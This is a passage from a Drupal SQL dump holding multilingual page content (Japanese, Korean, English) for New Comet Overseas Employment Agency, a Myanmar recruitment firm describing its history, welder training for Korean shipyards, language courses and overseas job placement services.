data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img data-entity-uuid=\"08a12c29-83b6-46ca-b835-84f7f6270b3d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\" data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img data-entity-uuid=\"1ffe4d12-0ef2-42f1-a14c-683cff75bd4c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_2.jpg\" data-align=\"center\" data-entity-uuid=\"e50b34c5-96f9-44a3-bc19-61e501f16184\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41.jpg\" data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 306, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本、韓国など、への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_3.jpg\" data-align=\"center\" data-entity-uuid=\"20d75075-fb13-4332-9836-0cdbf49b8dfd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_4.jpg\" data-align=\"center\" data-entity-uuid=\"e7288834-ff3b-480c-9234-fc6593057fbd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_3.jpg\" data-align=\"center\" data-entity-uuid=\"03602aa7-45bb-4473-9c3d-d87c28205132\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_3.jpg\" data-align=\"center\" data-entity-uuid=\"189e39d2-6713-4114-942b-44bd26eec52f\" data-entity-type=\"file\"><img data-entity-uuid=\"fc1b0cae-8888-42ef-b289-eab7a62c114f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-7_3.jpg\" data-align=\"center\" data-entity-uuid=\"df47ee75-79b9-4616-81c0-0e34a78c90ef\" data-entity-type=\"file\"><img data-entity-uuid=\"f46df6c8-2062-4477-94ba-4f7bdcb72096\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8_3.jpg\" data-align=\"center\"><img data-entity-uuid=\"5a38eb75-558d-43dc-b395-6e85f75cfa9d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9_3.jpg\" data-align=\"center\"><img data-entity-uuid=\"a5fa3a82-69bd-4cad-8cce-a8e6cfdfaa4d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_6.jpg\" data-align=\"center\"><img data-entity-uuid=\"627e8ddc-1573-4932-a000-86f210583339\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_6.jpg\" data-align=\"center\"><img data-entity-uuid=\"816827e9-8b4f-4529-a4ef-3a9efd261c46\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_6.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img data-entity-uuid=\"26718e0e-5474-4cfe-a694-aa62fbfcb114\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\" data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img data-entity-uuid=\"56e3de67-e8a5-47c1-b147-c73010cfdc6d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_3.jpg\" data-align=\"center\" data-entity-uuid=\"4b011db5-14e8-4a56-a6da-e6fe90c2e0f3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_0.jpg\" data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 306, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.<br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.<br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.<br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.&nbsp;<br>또한, 두바이, 말레이시아, 싱가포르, 태국, 일본, 그리고 한국 등과 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 갖을 수 있도록 &nbsp;서비스를 제공하고 있습니다.<br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.<br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.<br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img src=\"/sites/default/files/inline-images/1-NC_1.jpg\" data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-1_4.jpg\" data-align=\"center\" data-entity-uuid=\"95208b24-3912-47cb-b94e-77132a3ec814\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\" data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_5.jpg\" data-align=\"center\" data-entity-uuid=\"e9bcdc81-0d00-49fb-9571-b8bc777f5fdb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_4.jpg\" data-align=\"center\" data-entity-uuid=\"faa757f4-ca65-4ec0-9775-5e338a7528c8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_4.jpg\" data-align=\"center\" data-entity-uuid=\"b3288e51-9e4d-4c06-9d79-c0c9d7e39b05\" data-entity-type=\"file\"><img data-entity-uuid=\"de4eda5d-37a9-4856-a8b3-8044aa5bead5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-7_4.jpg\" data-align=\"center\" data-entity-uuid=\"7d1d0387-7914-47da-aa48-a5999065485b\" data-entity-type=\"file\"><img data-entity-uuid=\"4607347b-1944-4d26-8b30-94e9f4e5a82b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8_4.jpg\" data-align=\"center\"><img data-entity-uuid=\"a4d1fd76-c68d-4194-a623-938d24b3bd16\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9_4.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"ef024d3d-96d2-4823-a89f-4692a221c33b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_7.jpg\"><img data-entity-uuid=\"cfd6906a-4acf-47fb-885b-f36864758ac6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_7.jpg\" data-align=\"center\"><img data-entity-uuid=\"ce255a1f-b721-4067-b86e-ccf178fe8351\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_7.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\" data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\" data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-15_1.jpg\" data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16_1.jpg\" data-align=\"center\" data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-17_1.jpg\" data-align=\"center\" data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_1.jpg\" data-align=\"center\" data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" alt=\"\"><img data-entity-uuid=\"4d275af6-df8e-43b3-9938-e8398c3fa877\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-20_1.jpg\" data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\" data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_1.jpg\" data-align=\"center\" data-entity-uuid=\"48756932-2a18-4eed-9166-8ae3d494765e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\" data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\"><img data-entity-uuid=\"cc62c246-ae78-4d62-bfae-7e2e2193983c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\" data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\" data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\" data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\" data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\" data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_4.jpg\" data-align=\"center\" data-entity-uuid=\"be405527-a576-421a-af55-70724f3aed8b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_1.jpg\" data-align=\"center\" data-entity-uuid=\"f37e9936-ed46-428b-abbb-f585384d411f\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 24, 96, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 24, 97, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 24, 97, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 24, 137, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 24, 137, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 24, 137, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 24, 139, 'en', 0, '<p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, we provide services to facilitate employment opportunities , if necessary , we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p>', '', 'full_html'),
('page', 0, 24, 139, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 24, 139, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 24, 141, 'en', 0, '<p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, we provide services to facilitate employment opportunities , if necessary , we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p>', '', 'full_html'),
('page', 0, 24, 141, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 24, 141, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 24, 158, 'en', 0, '<p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, we provide services to facilitate employment opportunities , if necessary , we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p>', '', 'full_html'),
('page', 0, 24, 158, 'ja', 0, '<p class=\"MsoNormal\">1.&nbsp;<span style=\"mso-spacerun:yes;\"> </span><span lang=\"JA\">ニューコメットトレンディグエイジェンシーでは韓国の造船所で</span>E 7-3 Visa<span lang=\"JA\">で働きたいミャンマー全国から民族 &nbsp; &nbsp; &nbsp;問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介 &nbsp; &nbsp; &nbsp;をしております。</span><o:p></o:p></p><p class=\"MsoNormal\">2. <span lang=\"JA\">海外に勤める際使えるそれぞれの国の言葉が勉強できる学校も開いております。</span>(<span lang=\"JA\">現在日本語学校、韓国語学校</span>)<o:p></o:p></p><p class=\"MsoNormal\">3 .<span lang=\"JA\">パスポート作成サービス</span><o:p></o:p></p><p class=\"MsoNormal\">4. <span lang=\"JA\">日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp; &nbsp; &nbsp; &nbsp;取り込んでおります。</span><o:p></o:p></p><p class=\"MsoNormal\">5. <span lang=\"JA\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>NAT-TEST, TOP-J)<span lang=\"JA\">の</span>N3,N2<span lang=\"JA\">以上の合格者達にはワークビザである.</span></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;1. &nbsp; &nbsp;通訳、翻訳</span><o:p></o:p></p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 2. &nbsp; &nbsp;IT<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">事業</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;3. &nbsp; &nbsp;エンジニアに関する事業</span><span style=\"mso-spacerun:yes;\">&nbsp; &nbsp;</span><o:p></o:p>(Civil,Mechanical,EP,EC,Auto Card<span lang=\"JA\">など</span>)<o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;4. &nbsp; &nbsp;介護関係</span><o:p></o:p><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; 実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;1. &nbsp; &nbsp; 車修理関係</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;2. &nbsp; &nbsp;工業関係</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;3. &nbsp; &nbsp; 建築業関係</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;4. &nbsp; &nbsp; 食品関係</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;5. &nbsp; &nbsp; &nbsp;レストラン</span><o:p></o:p></p><p><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\" lang=\"JA\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 